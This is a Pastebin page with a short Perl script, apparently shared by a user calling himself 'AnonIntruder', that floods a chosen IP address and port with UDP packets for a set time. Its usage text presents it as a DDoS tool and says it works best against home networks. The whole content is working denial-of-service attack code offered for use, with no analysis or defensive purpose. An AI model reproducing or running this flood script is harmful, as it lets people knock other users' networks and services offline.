Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #By AnonIntruder
- #Port - Use NMAP To find open ports on host, 80 for webservers obviously
- #Size - Use '100 - 1000' (Recommended).
- #Changing the coding will not make you the maker, fuck off leechers ;)
- #This tool is most effective against a home network
- use Socket;
- use strict;
- print "\n";
- if ($#ARGV != 3) {
- print "\n\t\t\t***Error command must recieve four arguments***\n";
- print "-Ex) perl DDoS.pl 1.1.1.1 80 1000 300\n";
- print "-Therefore DDoSing the IP '1.1.1.1' for '300' seconds on port '80' using '1000' packets\n\n";
- exit(1);
- }
- my ($ip,$port,$size,$time) = @ARGV;
- my ($iaddr,$endtime,$psize,$pport);
- $iaddr = inet_aton("$ip") or die "Cannot connect to $ip\n";
- $endtime = time() + ($time ? $time : 1000000);
- socket(flood, PF_INET, SOCK_DGRAM, 17);
- print "~To cancel the attack press \'Ctrl-C\'\n\n";
- print "|IP|\t\t |Port|\t\t |Size|\t\t |Time|\n";
- print "|$ip|\t |$port|\t\t |$size|\t\t |$time|\n";
- print "To cancel the attack press 'Ctrl-C'\n" unless $time;
- for (;time() <= $endtime;) {
- $psize = $size ? $size : int(rand(1500-64)+64) ;
- $pport = $port ? $port : int(rand(65500))+1;
- send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement